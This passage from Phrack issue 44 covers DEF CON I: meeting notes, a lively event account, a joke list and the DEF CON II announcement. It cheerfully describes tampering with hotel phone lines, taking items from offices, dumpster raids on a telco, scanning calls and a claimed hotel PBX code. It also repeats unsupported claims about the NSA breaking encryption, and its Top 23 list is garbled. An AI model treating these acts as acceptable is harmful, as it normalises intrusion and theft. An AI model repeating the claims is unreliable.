  5622. working on PGP using RSAREF for noncommercial users.
  5623.  
  5624. Q. Compare the strength and security of PGP and RIPEM?
  5625.  
  5626. A. PGP uses a longer key.  RIPEM uses DES, but will probably go to Triple-
  5627. DES.
  5628.  
  5629. Q. How are blind signatures used?
  5630.  
  5631. A. Voter cards, digital signatures, digital money.  The government won't
  5632. do it if they feel it's not in their best interest.  Push it.
  5633.  
  5634. Q. Can NSA break DES & PGP?
  5635.  
  5636. A. Of course.
  5637. Q. How long must a key be to slow NSA down?
  5638.  
  5639. A. We estimate they can break one 512 bit RSA modulus per day.
  5640.  
  5641. Q. Is PGP illegal, and if so, how?
  5642.  
  5643. A. Patent infringement issue is whether PGP infringes RSA.  If you use a
  5644. product that infringes, you are civilly liable.  If they were to enforce
  5645. against a random user, worst case is that the user might be tied up in the
  5646. courts for a while.  Worse is copyright - it is a felony to engage in
  5647. software piracy, which means making over 10 copies with a value over
  5648. $2500.  This poses a potential problem for sysadmins, and now companies
  5649. use the threat of criminal charges to force licensing.  Kapor is willing
  5650. to take the case of whether or not there could ever be a valid software
  5651. patent to the Supreme Court.  Godwin says prosecutors will use other laws:
  5652. Wire fraud, conspiracy, RICO.
  5653.  
  5654. Hughes - there should be a local cypherpunks chapter.  It should meet on
  5655. the second Saturday of the month.  Hughes is pursuing the idea of
  5656. teleconferencing.
  5657.  
  5658. Hughes concludes: "There's plenty of arguing to do.  I'll see you online."
  5659.                               ==Phrack Magazine==
  5660.  
  5661.                 Volume Four, Issue Forty-Four, File 7 of 27
  5662.  
  5663.                                  Conference News
  5664.  
  5665.                                      Part II
  5666.  
  5667. ****************************************************************************
  5668.  
  5669. xxxxxxxxxxxxxxxxxx xxx xx x  xx              DEF CON I, Las Vegas 1993
  5670. xxxxxxxXXXXxxxxxxxxxxxxx xx  x x          I'll attempt to give you guys
  5671. xxxxxxXXXXXXxxxxx x   x     x        the real deal on what happened.  Since you
  5672. xxxxxXXXXXXXXxxxxx xx   x x          most likely don't care about the whole
  5673. xxxxXXXXXXXXXXxxx x  xxxxxxxx x      planning side of it I'll just talk about
  5674. xxxXXXXXXXXXXXXxxxxxxxxxx  x         what happened of interest.
  5675. xxXXXXXXXXXXXXXXxxxxxx   xx   x
  5676. xxxXXXXXXXXXXXXxxxxxxxx              I showed up at the Sands Hotel later than
  5677. xxxxXXXXXXXXXXxxxxxxxx  x x  xx      I thought, thanks to a delay at the
  5678. xxxxxXXXXXXXXxxxxxxx xxx   xx  x     airport and a ride on the slowest hotel
  5679. xxxxxxXXXXXXxxxxxxx x x  x           shuttle known to mankind.  It had to stop
  5680. xxxxxxxXXXXxxxxxxxxxxx xx x x        at every other hotel before it made it to
  5681. xxxxxxxxxxxxxxxxxxxxxxxxxxxxxx x     mine.  Oh well.
  5682.  
  5683.     So I check in and go to check out the conference room, which happens to be
  5684. right next to the conference planning room for the hotel.  "Hmm, they will be
  5685. gone for the weekend though, so we should be safe," I think as I wander into
  5686. "The Burgundy Room"  Sounds like a room in "Clue."  Anyway there are like maybe
  5687. six other people there.  Dead Addict has been holding down the fort, and wanted
  5688. to go get drinks so I set him free to frolic as I set up shop.  I handed out
  5689. tags to the people who had shown up and settled in for the duration.
  5690.  
  5691.     Someone had brought a cd player, so I put on a tape and got the music
  5692. going.  Red Five was there sporting scanners and radio gear, this guy had wires
  5693. sticking out all over the place.  "Good thing they turned to phones off," I say
  5694. looking around the room happy that I wouldn't be stuck with a $31,312 phone
  5695. call to Eastern Europe.  "Yeah, we already checked that one," said one of the
  5696. "hammies" gesturing to the phone jack I had seen.  I notice a large cable
  5697. running from the jack to a larger junction box at about the same time their
  5698. eyes light up with glee.  "Get the handset!," one says as another advances on
  5699. the box with a tool kit that appeared out of thin air.  "I'll need the ohm
  5700. meter and some clips."  the box is dismantled, and three people swarm it in
  5701. a line testing frenzy.  "No good on one.. two.. three.. got tone on four!"
  5702. Great, I think, I'm fucked!  "hhmm.. seems to be just the hotel, can't get an
  5703. outside line.."
  5704.  
  5705.     This goes on for some time until I persuade them to stop fucking with the
  5706. box and to do something else.  They give up bored, and start exploring the
  5707. rooms next to us finding a hallway that leads to a security camera monitoring
  5708. the casino tables below.  Some decide it's not cool to be recorded and return
  5709. from there in a hurry, while others locate a travel agent's office and start
  5710. grabbing a few things of no consequence.  We grabbed two large easels holding
  5711. large pads of paper for people to draw/write on.
  5712.  
  5713.     About this time the lady in charge of convention planning calls me to her
  5714. office.  "We got a call from the communications room.  They said things were
  5715. lighting up on their board that aren't supposed to be lighting up from your
  5716. conference room.  They say if it doesn't stop that you'll be thrown out of the
  5717. hotel."  Zowie.  "OK, I got them to stop.  They were just trying out their
  5718. computer on the phone line to see if they could place a call," (Yeah, right)
  5719. "but I'm sure it won't happen again."  The assistant in the office spoke up
  5720. and said something like, "Well, if you can clear my credit card I'm sure we
  5721. wouldn't mind!" To which the main lady, Moreen, said "Yeah, my name is Moreen
  5722. Robinson, and my Social Security number is..."  What did they think?  "Yeah,
  5723. I'll get my credit erasers on it right away!"??
  5724.  
  5725.     Back at the room things started to pick up.  People came in throughout the
  5726. day, and the bar downstairs was having a $1 margarita special.  Someone bought
  5727. twenty drinks for everyone (All right!) and then we got a picture more of them.
  5728. Metal Head went and got me a drink while he was out.  Things were looking good
  5729. through this buzz of mine.  Judi Clark of the Bay Area CPSR showed up (one of
  5730. the speakers) and was real cool.  She was jonesing for an internet connection,
  5731. but we couldn't line one up with a slip connection for her.  She had brought
  5732. some literature to distribute, too.
  5733.  
  5734.     Around six or seven or so we had a pretty good crowd going, with more and
  5735. more speakers showing up.  Ray Kaplan (Kaplan and Associates) drove like a
  5736. maniac out of Arizona, and Dr. Ludwig (Author of Little Black Book of
  5737. Computer Viruses) drove up with Merc from Arizona also.  It was about ten or
  5738. so Friday night and people were getting to know each other.  Some more radio
  5739. guys showed up, including the Jackal, and they were in another corner speaking
  5740. in some other language.. stuff I won't even try to reproduce here.  It revolved
  5741. around the best ways to pick up restricted channels and how not to be
  5742. triangulated.  Cool.
  5743.  
  5744.     Speculation was rising about what Gail Thackery would be like, and when
  5745. Gillian from New Media Magazine showed up to cover the event people figured
  5746. that she must be Gail.  Nope.  Gail showed up about a half hour later.
  5747. Conversation in the room stopped, and all eyes were on Gail.  She didn't seem
  5748. to notice, and came up and said hello.  I gave her a speakers id pass, and
  5749. she went off to find a drink.  When she returned people started to talk to her,
  5750. and by about midnight she was mobbed with people.  She had a captive audience
  5751. at the back of the room and was fielding all types of questions.  Some guy was
  5752. saying "Say, hypothetically, that you have 9 gigs all encrypted on your, re,
  5753. a bbs and you get raided, wow will they get the evidence?"  Gail's response
  5754. was basically if they have enough evidence to boot in your door they should
  5755. have enough evidence to prosecute a case.  Want to be a test case for
  5756. encryption?  Neither did he.
  5757.  
  5758.     Kurt Karnow, the VR speaker from San Francisco showed up and was talking
  5759. with the New Media Reporter.  Some local radio d.j. who does a late night
  5760. cutting edge style showed up to grab some audio clips from me and bailed out.
  5761. A "suit" showed up, and everyone immediately, in an attempt to win the free
  5762. "I spotted the fed" shirt pointed him out to me.  This "suit" had cop eyes,
  5763. cop walk and cop speak.  He was all businesslike, and wanted to talk to me
  5764. in private.  I took him into the "cone-o-silence" room (the hallway connected
  5765. to the travel agent's place) and asked what's up.  Turns out he is a writer
  5766. for Loompanics and was there checking to see if there was anything or anyone
  5767. worth writing about or having write for him.  Everyone was sure I was a super
  5768. narc after coming out of the cone, but he started loosening up and was talking
  5769. with everyone by the next day.  If he was a fed, they have great feds out there
  5770. that are almost undetectable.  He said his cop speak is a great way to get
  5771. people to tell him stuff they wouldn't normally say.
  5772.  
  5773.     Dan Farmer showed up with a female harem in tow.  He seemed to have this
  5774. ability to magically attract females, but we won't get into that here.  He
  5775. would make an appearance and then leave every once in a while.  His women
  5776. looked bored (there were three of them) so I assume he was keeping them
  5777. entertained by gambling or something...
  5778.  
  5779.     Dark Druid showed up with Richard Finch, an author who is writing a book
  5780. entitled "The underground road map through cyberspace"  Oh, yeah.  This guy
  5781. still owes me a copy of the video tapes from the convention.  Basically a
  5782. snake.  Said he would send me a copy of them, and then moved and changed his
  5783. number.  We located him and he said he would send them again.  Not.  L00zer.
  5784. Dark Druid was cool, though, and was franticly looking for alcohol to comfort
  5785. him after the long drive.
  5786.  
  5787.     One person I met worked for Logicon, SOF Weapon Systems, doing "Nuclear
  5788. event testing."  Basically his job is to see if he can break in and cause a
  5789. simulated "event" (missile launch, detonation, etc.) to happen.  I'll invite this
  5790. guy to speak at DEF CON ][ for sure.  Not that people are going to hack silos,
  5791. but it was very interesting to say the least.
  5792.  
  5793.     It was decided it was time for a "Death Star" raid (we had spotted the
  5794. local AT&T office with a billion repeaters and microwave shit on the roof)
  5795. and rounded up a crew to go attack it.  Of course Red Five was standing by
  5796. (Ow!) and Gillian offered to rent a limo to go trashing in.  It turned out
  5797. that it would take 1/2 hour to get the limo, so we went in two cars instead.
  5798. After getting lost in the Las Vegas Hell we found the target.  Fences
  5799. everywhere, a guard patrolling, and an unprotected dumpster just by the
  5800. fences.  Red Five radioed to his friend, we coordinated an attack plan.  I
  5801. laid down flat in the back of the truck, another car was "blocker" on the
  5802. street.  We turned in, screeched up to the treasure chest, I bailed out and
  5803. hurled the bags into the truck and pounced on top of them to the papers
  5804. wouldn't fly out as we hauled ass outta there.  Those Vegas telco employees
  5805. eat more dino-sized McMeals and burgers than I can count.  My body was almost
  5806. covered in apple pie containers and happy meals, yuck.  We hauled the find up
  5807. to the room, and the people who were still up dived on it.  Jamin the Shamin
  5808. went bonkers rooting through crap, and I think White Ninja was sportin' wood.
  5809. People got some interesting items (catalogues, some x.25 phone numbers, etc..)
  5810. while I got to clean up the mess, er, wreckage in the room.  Everyone pitched
  5811. in and by two thirty a.m. it was time to snooze.  Everyone took off to wherever
  5812. they were going, and a few people stuck around to crash in the conference room.
  5813.  
  5814.     It seems over the night that the late shift of security personnel were not
  5815. informed that I had the conference room 24 hours.  They showed up at around
  5816. four a.m. and saw Code Ripper, The Prophet and Merc crashed out and they went
  5817. nuts.  At first they asked them to leave to room.  The Prophet explained that
  5818. the room was rented 24 hours, and they didn't care.  He then asked to talk to
  5819. the assistant manager.  They didn't like this and called in the goons.  Like
  5820. five or more guards showed up.  In Las Vegas the goons carry guns.  These guys
  5821. asked to have 'em leave and Code Ripper and Merc were like "Sure, no prob.
  5822. Later!"  The Prophet continued to bitch and got a personal interview with head
  5823. guard man and then a personal boot off the hotel's property.
  5824.  
  5825.     Saturday morning I get a fax that Allen Grogan (Editor of the Computer
  5826. Lawyer) won't be able to make it because of a family emergency.  That's one less
  5827. speaker.  Already Count Zero's dad went ballistic when he found out his son
  5828. might speak at the con.  He threatened to sue me if he showed up.  Dude, chill,
  5829. it's your son, not mine.  It turns out he called the Sands Hotel ranting and
  5830. raving at anyone he could.  Moreen said, "he was spouting off things about law
  5831. suits and some such, so I transferred him to legal."  What a kook.  Midnight
  5832. Sorrow (used to run CCi) backed out too after his phone bills reached like
  5833. half of the national debt.  ErikB spent too much money at SCon and he bailed
  5834. out also.  They were dropping like flies!  Scott Simpson wasn't about to show
  5835. up after his door was kicked in with the help of various federal agencies,
  5836. either.  Oh well, we still had a full speaking list.
  5837.  
  5838.     Robert X. Cringly from Info World was there, a photographer from Mac World,
  5839. John Littman, Unix World (<- an evil review.. don't believe it.. it was all
  5840. wrong and jumbled.  Rik Farrow messed it up) another photographer who took the
  5841. picture that ended up in New Media was there.  The photographer (Who turned
  5842. out to be Karnow's sister) gathered some "cyberpunk" looking people together
  5843. for it.. needless to say I wasn't in it.  She bought a bunch of alcohol for
  5844. everyone, so that wasn't so bad.
  5845.  
  5846.     I did a little blurb welcoming everyone and talking about my run in at the
  5847. Seattle 2600 meeting a few weeks before, and then let Ray K. start off the
  5848. convention.  About halfway through the talks before lunch, the X. Cringe factor
  5849. got a cellular phone call, and got up to leave the room so as not to disturb
  5850. the audience.  He was about halfway towards the door when you could hear
  5851. scanners turning on all over the room (well, OK, three of them) and a
  5852. coordinated effort was put forth to find his call.  Some start at the low
  5853. frequencies and worked up, and some at the high frequencies and worked down.
  5854. It turns out it was only Pammy, and no super secret industry gossip.  Bummer.
  5855.  
  5856.   I'm not going to cover exactly what the speakers had to say because I wouldn't
  5857. know what to include and what not too.  Get the tapes, or ftp the huge
  5858. digitized speeches off the ftp site (cyberspace.com /pub/defcon) and listen
  5859. to 'em.  We tried to make typed transcripts, but they were a nightmare, so we
  5860. gave up on it.  This is basically what was covered:
  5861.  
  5862.      Ray Kaplan did a verbal sample of the attendees, and then went on to talk
  5863. about morality and the hacking ethic.  He came across pro-responsible-hacker,
  5864. but managed to get into a debate with Torquamada who though he was preaching
  5865. too much.  A good exchange, and his talk reminded me of some of the stuff you
  5866. hear on IRC late at night when #hack becomes #hack-politics, only better.
  5867.  
  5868.      Gail Thackery spoke about where the law is coming from in all this, and
  5869. was very straight forward with a no shit attitude.  She said she loved
  5870. capturing and collecting all the log in screens of bbs systems that have lame
  5871. disclaimers like "If you are a fed you can't log on here.  If you press 'y'
  5872. you can never narc on me."  She swaps 'em with her other law enforcement
  5873. friends.  As a side note we were selling hack pads and bbs pads that attempted
  5874. to organize all the notes people make in the course of things.  It seems every
  5875. one who gets nabbed gets nabbed with their "bust-me book"  You know, that
  5876. note pad with all the incriminating evidence on it that everyone keeps.  Well
  5877. we figured we'd at least make things easier so we had these pads.  Gail looked
  5878. them over and made a comment like, "Oh, those look just like ours except we
  5879. have a space for the case number in the upper right hand corner."
  5880.  
  5881.      Judy Clark from the CPSR spoke about the role of the CPSR (Computer
  5882. Professionals for Social Responsibility) as opposed to that of the EFF which
  5883. is almost entirely, well, er, it is, sponsored by large corporations including
  5884. computer and telephone interests.  She spoke about privacy issues and what to
  5885. do if you are interested in getting involved.
  5886.  
  5887.      There was a panel discussion with Gail and Ray K fielding questions from
  5888. the audience.  Ray talked about how security is useless unless the employers
  5889. and employees are willing to change their way of working.  It's not as simple
  5890. as installing the latest and greatest security packages.
  5891.  
  5892.      Kurt Karnow works as an attorney for a San Fransisco law firm that
  5893. represents large companies such as AT&T and Sega.  He spoke about "ZUI" or
  5894. Zero User Interface as envisioned in the future with VR equipment.  He talked
  5895. about how impossible it is to  debug any large program 100%, and that mistakes
  5896. and problems will occur.  He talked of a recent case he worked on, where the
  5897. makers of "Sim City" made "Sim Oil Refinery" for a large oil company.  The
  5898. company was concerned that if their software was programmed incorrectly, and
  5899. they find that out by having a refinery explode when the employees did
  5900. something they were trained to do, that they could loose all.  Kurt was also
  5901. great is shamelessly hoping some for a few good accidents so he could finance
  5902. his kids through college.  A very well informed and easy to talk to person.
  5903.  
  5904.      Dr. Mark Ludwig Spoke about the philosophy behind his virii programming
  5905. analysis.  It was almost a political talk about the invasive government
  5906. policies and the desire of the Federal System to be the know all and be all
  5907. in the future.  He spoke about their attempts to restrict encryption
  5908. technologies.  He announced that he has come up with a virus that acts as a
  5909. software delivery service for the IDEA encryption algorithm.  When you
  5910. insert this disk, or get the "infection" it asks if you want to encrypt your
  5911. fixed disk, and then asks for your password.  Any floppy that is inserted on
  5912. your system gets encrypted and infected with the password of your choice.
  5913. You can toggle the encryption on and off, un-install your hard drive, etc.  He
  5914. posed the question to the crowd, "What if everyone woke up one day and all
  5915. their data was safely encrypted?  If encryption became the standard, people
  5916. would have less to fear from Big Brother."  I've got the virus, called the
  5917. KOH virus, currently being updated, and will bring it to Pump Con ][, Ho Ho,
  5918. Etc. for anyone interested.
  5919.  
  5920.      Dead Addict spoke on the past and the future as he sees it of the Computer
  5921. Underground's various factions.  The increase of people on the net and the use
  5922. of more and more networks will yield rich lands to be explored.  It turned
  5923. into a question and answer with people discussing their view on where things
  5924. are going.
  5925.  
  5926.      Dan Farmer spoke on Unix security.  He was very good and sounded very well
  5927. informed.  He has learned his tricks monitoring the 30,000 or so workstations
  5928. used by Sun Microsystem and else where over the years.  He talked about how
  5929. people get caught and what to do about it.  How sysadmins usually monitor and
  5930. maintain their systems.  Basically he was bored with password crackers and lame
  5931. passwords.  He focused on the creative ways to get root.  "If you can gain
  5932. access enough to execute one command on the victim computer, you should be able
  5933. to get root."  He avoided bugs and problems that will be fixed, and focused on
  5934. flaws in the way systems and networks are set up.
  5935.  
  5936.      Dark Druid talked about his bust and how it sucks not to be charged and
  5937. still not have his equipment back after it was seized.
  5938.  
  5939.     Right as the group was breaking up someone did a quick impromptu
  5940. demonstration to a few people of a laptop plugged into the diagnostic port of a
  5941. cell phone that allowed all types of crazy activity.  People broke into groups
  5942. and went out for dinner.  I ended up with Gail Thackery, Gillian the reporter,
  5943. Kurt Karnow, the sysadmin of cyberspace and a few others.  General B.S. about
  5944. government plots and assassinations ensued with real discussions branching off.
  5945. Because there are no clocks anywhere in Las Vegas we kinda lost track of time,
  5946. and wandered back to the hotel in an hour or so.  People changed and the broke
  5947. off to do their thing.
  5948.  
  5949.     I ran into a guy from SGI security at the bar, and then Dan Farmer, and
  5950. then Aleph One, and then fuck, it seemed like a mini con at the bar.
  5951. People were drinking like fiends, and Gail showed up with Gillian and the crowd
  5952. from L.A. and the San Francisco 2600 group was there drinking too.  Gail was
  5953. chain smoking and pounding Johnny Walker straight, drinking most of us under the
  5954. table.  I think that shocked more people more than anything else!  We finally
  5955. got a thinly clad waitress to take a group picture, where everyone is all
  5956. smiles and laughing, and Gail has this evil frown looking like this is the last
  5957. place on earth she wants to be.  Right as the pic is taken someone goes to fake
  5958. pour a drink on her head, making for a great picture WHICH I STILL DON'T HAVE!
  5959. (Aleph One, send me that digitized picture so I can stick it on the ftp site)
  5960.  
  5961.     Sunday people just hung out to bull-shit about whatever, with groups
  5962. forming on and off till everyone took off for home.  Someone approached me
  5963. and let me know that they had the password for the Sands Hotel Vax
  5964. system and the barrier code for their PBX.  "If the hotel gave you too much
  5965. trouble, just let me know."  You would think that after years of mob and
  5966. crime action the casino would have a functional security set up.  Not.  That
  5967. was area code 702 for anyone interested in scanning it.
  5968.  
  5969.     A few of use were sitting around waiting for time to pass when I found a
  5970. bunch of wires wrapped together from the death star raid Friday night.  It sort
  5971. of looked like a mini whip, and was immediately termed the "Def Con Cyber-Whip"
  5972. Needless to say, we had to present the Cyber-Whip to Dan Farmer for his
  5973. excellent contribution mention of a.s.b. during his speech that seemed to
  5974. cause the most gossip.  Hacking a network? No problem.  Talking about a.s.b.?
  5975. OuTrAgEoUs!  People are so funny.  Anyway, Dan is now the keeper of the
  5976. Cyber-Whip.  We'll try to come up with a more formal presentation next year.
  5977. That should drive the media nuts.  Hey, with a little help from ErikB for video
  5978. entertainment maybe create a Def Con dungeon. Ha! Ok, it's late.  Hackers are
  5979. such sick people.
  5980.  
  5981.     A lot of people made great contacts and I'm still hearing of people who
  5982. are working with their new contacts doing "things"  I managed to weasel a
  5983. job out of the deal, writing a small monthly column in New Media Magazine
  5984. (as my editor puts it) on "Interesting things that could only happen on the
  5985. net."  This gets translated to reading a bunch of newsgroups in a futile
  5986. attempt to find something that would be amusing to the readership.  If you
  5987. guys have any good rumors you want mentioned, just feed 'em to me in e-mail.
  5988.  
  5989.     Overall a good time.  We planned for about 100 people max, and we got just
  5990. around 110 or so.  Our blurb in 2600 came out late, Mondo 2000 missed an issue
  5991. and Wired messed up hard core twice.  I had mailed LR inviting someone to
  5992. attend and asking if we could get a mention in the upcoming events section. He
  5993. said sure, just e-mail me.  I did that and nothing happened.  I talked to him,
  5994. and he said I should send it to someone else at Wired, which I did.  It wasn't
  5995. in the next issue either!  Right before the con I got e-mail form someone at
  5996. Wired asking me if the convention was still on and what its status was.  They
  5997. are nice people there, just a little bit confused or busy.  This was happening
  5998. right after wired.com got hacked so they might have been preoccupied.  This
  5999. year we won't miss any deadlines and make sure that the word gets spread well
  6000. in advance so we can get a greater turn out, but for a first attempt it went
  6001. over well.  No fights, fire alarms pulled or people vomiting on the gamblers.
  6002. The things that could be improved like more technical speeches, etc., will all
  6003. be fixed in DEF CON ][.  We'll have midnight tech talks, terminals hooked up
  6004. to the net for people to IRC on or whatever, and additional speeches on Sunday
  6005. so people have an excuse to stick around that day.
  6006.  
  6007.     [Generic closing statement omitted]
  6008.  
  6009.     The Dark Tangent
  6010.     dtangent@defcon.org
  6011.  
  6012. *******************************************************************************
  6013.  
  6014.                     Top 23(!) things learned at DEF CON 1
  6015.                              By The White Ninja
  6016.  
  6017.                         "Jesus Hacks! Why don't YOU?"
  6018.  
  6019.                  This text file idea blatantly leeched from:
  6020.                                  SummerCon!
  6021.  
  6022. 1.  Casino offices can be full of fun!!
  6023.  
  6024. 2.  Casinos generally don't appreciate it when you explore their offices....
  6025.  
  6026. 3.  Yes, some people ARE capable of gambling away $167 in an hour!
  6027.  
  6028. 4.  You can get reasonable conference discounts on prostitution in Nevada.
  6029.  
  6030. 5.  One can survive for 3 days in Vegas on $12 and a gift certificate.
  6031.  
  6032. 6.  Viruses are our friends.
  6033.  
  6034. 7.  Give a Casino security guard a walkie-talkie and he'll swear he's the
  6035.     center of the universe.
  6036.  
  6037. 8.  Don't commit a felony in front of Gail Thackery.
  6038.  
  6039. 9.  The people who work at the Death Star throw the darndest things in the
  6040.     trash!
  6041.  
  6042. 10. Pirates and Theives ONLY!
  6043.  
  6044. 11. If you harass a hotel telephone operator long enough she WILL send
  6045.     security.
  6046.  
  6047. 12. When using ITT ask for BOB...
  6048.  
  6049. 13. Metal plates screwed to your hotel room ceiling generally constitute a
  6050.     bad sign.
  6051.  
  6052. 14. Don't forget to Hack the BED!
  6053.  
  6054. 15. You know your in deep shit when THEY aim an IR-Mic at your window.
  6055.  
  6056. 16. Setting 11 fires in selected parts of the city is probably a bad idea.
  6057.  
  6058. 17. The guy who looks most like a fed probably writes for LOOMPANICS.
  6059.  
  6060. 18. The guy who looks least like a fed probably does security for SUN.
  6061.  
  6062. 19. As a general rule, don't hack the hotel PBX unless you're giving them a
  6063.     better credit rating.
  6064.  
  6065. 20. If your wondering where all those C-64 warez kidz went, try talking to
  6066.     some of the beggars in Vegas.
  6067.  
  6068. 21. Those COCOTS were gold plated for a REASON!
  6069.  
  6070. 22. If you plan to stay the night in a hotel, make sure you get a room there.
  6071.  
  6072. 23. "0K, dit rating.
  6073.  
  6074. 20. If your wondering where all those C-64 warez kidz went, try talking to
  6075.     some of the beggars in Vegas.
  6076.  
  6077. 21. Those COCOTS were gold plated for a REASON!
  6078.  
  6079. 22. If you plan to stay the night in a hotel, make sure you get a room there.
  6080.  
  6081. 23. "0K, this is my new PGP key for use in sensitive matters. Heck, use
  6082.     it for unsensitive matters.. people sniff packets 'ya know."
  6083.  
  6084. *******************************************************************************
  6085.  
  6086. What Was Your Best Hack                                         September, 1993
  6087. ~~~~~~~~~~~~~~~~~~~~~~~
  6088. (New Media) (Page 14)
  6089.  
  6090. [Asked at Def Con 1, the first formal gathering of the hacker community
  6091.  to discuss security, viruses and the law.]
  6092.  
  6093. Mike Winters, 19, Seattle
  6094.    Claims to have hacked into GMAC and then held a conference call with
  6095.    GM's VP of Finance to help him "secure the system."
  6096.  
  6097. HB, San Mateo, California
  6098.    Broke into a system to counterfeit checks to "show his employers
  6099.    how easy it was."  Got arrested with two years probation and
  6100.    24 days of community service.
  6101.  
  6102. Gail Thackeray, 44, Deputy County Attorney, Phoenix
  6103.    A Hacker had broken into a voice mail system and was using it
  6104.    as a code line.  The company could not take down the system
  6105.    until the prosecutors were ready to make a case.  When they did,
  6106.    the company blocked all access and changed the greeting to
  6107.    a song parody of "Hey Jude" called "Hey Dood," which really
  6108.    infuriated the hacker.
  6109.  
  6110. *******************************************************************************
  6111.  
  6112. Dead Addict At Def Con                                          September, 1993
  6113. ~~~~~~~~~~~~~~~~~~~~~~
  6114. by Gillian Newson (New Media) (Page 119)
  6115.  
  6116. ["The oldest cyberchick" hangs with the Def Con Posse and discovers
  6117.  the joys of trashing.]
  6118.  
  6119. *******************************************************************************
  6120.  
  6121. READ & DISTRIBUTE & READ & DISTRIBUTE & READ & DISTRIBUTE & READ & DISTRIBUTE
  6122.  
  6123. ]]]]]]]]]]]]]]]]]] ]]] ]] ]  ]]   DEF CON ][ Initial Announcement
  6124. ]]]]]]]^^^^]]]]]]]]]]]]] ]]  ] ]  DEF CON ][ Initial Announcement
  6125. ]]]]]]^^^^^^]]]]] ]   ]     ]     DEF CON ][ Initial Announcement
  6126. ]]]]]^^^^^^^^]]]]] ]]   ]         DEF CON ][ Initial Announcement
  6127. ]]]]^^^^^^^^^^]]] ]  ]]]]]]]] ]   DEF CON ][ Initial Announcement
  6128. ]]]^^^^^^^^^^^^]]]]]]]]]]  ]      DEF CON ][ Initial Announcement
  6129. ]]^^^^^^^^^^^^^^]]]]]]   ]]   ]   DEF CON ][ Initial Announcement
  6130. ]]]^^^^^^^^^^^^]]]]]]]]           DEF CON ][ Initial Announcement
  6131. ]]]]^^^^^^^^^^]]]]]]]]  ]  ]]     DEF CON ][ Initial Announcement
  6132. ]]]]]^^^^^^^^]]]]]]] ]]]   ]]  ]  DEF CON ][ Initial Announcement
  6133. ]]]]]]^^^^^^]]]]]]] ] ]  ]        DEF CON ][ Initial Announcement
  6134. ]]]]]]]^^^^]]]]]]]]]]] ]] ] ]     DEF CON ][ Initial Announcement
  6135. ]]]]]]]]]]]]]]]]]]]]]]]]]]]]]] ]  DEF CON ][ Initial Announcement
  6136.  
  6137. READ & DISTRIBUTE & READ & DISTRIBUTE & READ & DISTRIBUTE & READ & DISTRIBUTE
  6138.  
  6139. WTF is this?  This is the initial announcement and invitation to DEF CON ][,
  6140. a convention for the "underground" elements of the computer culture.  We try
  6141. to target the (Fill in your favorite word here): Hackers, Phreaks, Hammies,
  6142. Virii coders, programmers, crackers, Cyberpunk Wannabees, Civil Liberties
  6143. Groups, CypherPunks, Futurists, etc..
  6144.  
  6145. WHO:   You know who you are, you shady characters.
  6146. WHAT:  A convention for you to meet, party, and listen to some speeches that
  6147.        you would normally never hear.
  6148. WHEN:  July 22, 23, 24 - 1994
  6149. WHERE: Las Vegas, Nevada @ The Sahara Hotel
  6150.  
  6151. So you heard about DEF CON I, and want to hit part ][?  You heard about the
  6152. parties, the info discussed, the bizarre atmosphere of Las Vegas and want to
  6153. check it out in person?  Load up your laptop muffy, we're heading to Vegas!
  6154.  
  6155.  
  6156. Here is what Three out of Three people said about last years convention:
  6157.  
  6158. "DEF CON I, last week in Las Vegas, was both the strangest and the best
  6159. computer event I have attended in years." -- Robert X. Cringely, Info World
  6160.  
  6161. "Toto, I don't think we're at COMDEX anymore." -- Coderipper, Gray Areas
  6162.  
  6163. "Soon we were at the hotel going through the spoils: fax sheets, catalogs,
  6164. bits of torn paper, a few McDonald's Dino-Meals and lots of coffee grounds.
  6165. The documents disappeared in seconds."  -- Gillian Newson, New Media Magazine
  6166.  
  6167. DESCRIPTION:
  6168.  
  6169. Last year we held DEF CON I, which went over great, and this year we are
  6170. planning on being bigger and better.  We have expanded the number of speakers
  6171. to included midnight tech talks and additional speaking on Sunday.  We attempt
  6172. to bring the underground into contact with "legitimate" speakers.  Sure it's
  6173. great to meet and party with fellow hackers, but besides that we try to
  6174. provide information and speakers in a forum that can't be found at other
  6175. conferences.
  6176.  
  6177. WHAT'S NEW THIS YEAR:
  6178.  
  6179. This year will be much larger and more organized than last year.  We have a
  6180. much larger meeting area, and have better name recognition.  Because of this
  6181. we will have more speakers on broader topics, we plan on having a slip
  6182. connection with multiple terminals and an IRC connection provided by
  6183. cyberspace.com.  We are trying to arrange a VR demo of some sort.  Dr. Ludwig
  6184. will present this years virus creation award.  There will be door prizes, and
  6185. as usual a bigger and better "Spot The Fed" contest.  If you are elite enough
  6186. to handle it, there should be the returning of the Cyber-Whip and the
  6187. beginning of a new one.  We'll try to get an interesting video or two for
  6188. people to watch.  If you have any cool footage you want shown, email me with
  6189. more information.
  6190.  
  6191.  
  6192. WHO IS SPEAKING:
  6193.  
  6194. We are still lining up speakers, but we have several people who have expressed
  6195. interest in speaking, including Dr. Mark Ludwig (Little Black Book Of Computer
  6196. Viruses), Phillip Zimmerman (PGP), The Mentor (Steve Jackson Games),
  6197. Ken Phillips (Meta Information), and Jackal (Radio) to name a few, plus there
  6198. should be a mystery speaker via video conference.  We are still contacting
  6199. various groups and individuals, and don't want to say anything until we are as
  6200. sure as we can be.  If you think you are interested in speaking on a self
  6201. selected topic, please contact me.  As the speaking list is completed there
  6202. will be another announcement letting people know who is expected to talk, and
  6203. on what topic.
  6204.  
  6205.  
  6206. WHERE THIS THING IS:
  6207.  
  6208. It's in Las Vegas, the town that never sleeps.  Really. There are no clocks
  6209. anywhere in an attempt to lull you into believing the day never ends.  Talk
  6210. about virtual reality, this place fits the bill with no clunky hardware.  If
  6211. you have a buzz you may never know the difference.  It will be at the Sahara
  6212. Hotel.  Intel as follows:
  6213.  
  6214.         The Sahara Hotel 1.800.634.6078
  6215.         Room Rates: Single/Double $55, Suite $120 (Usually $200) + 8% tax
  6216.         Transportation: Shuttles from the airport for cheap
  6217.  
  6218.    NOTES:  Please make it clear you are registering for the DEF CON ][
  6219.    convention to get the room rates.  Our convention space price is
  6220.    based on how many people register.  Register under a false name if
  6221.    it makes you feel better, 'cuz the more that register the better for
  6222.    my pocket book.  No one under 21 can rent a room by themselves, so
  6223.    get your buddy who is 21 to rent for you and crash out.  Don't let
  6224.    the hotel people get their hands on your baggage, or there is a
  6225.    mandatory $3 group baggage fee.  Vegas has killer unions.
  6226.  
  6227.  
  6228. COST:
  6229.  
  6230. Cost is whatever you pay for a hotel room split however many ways, plus
  6231. $15 if you preregister, or $30 at the door.  This gets you a nifty 24 bit
  6232. color name tag (We're gonna make it niftier this year) and your foot in the
  6233. door.  There are fast food places all over, and there is alcohol all over
  6234. the place, the trick is to get it during a happy hour for maximum cheapness.
  6235.  
  6236.  
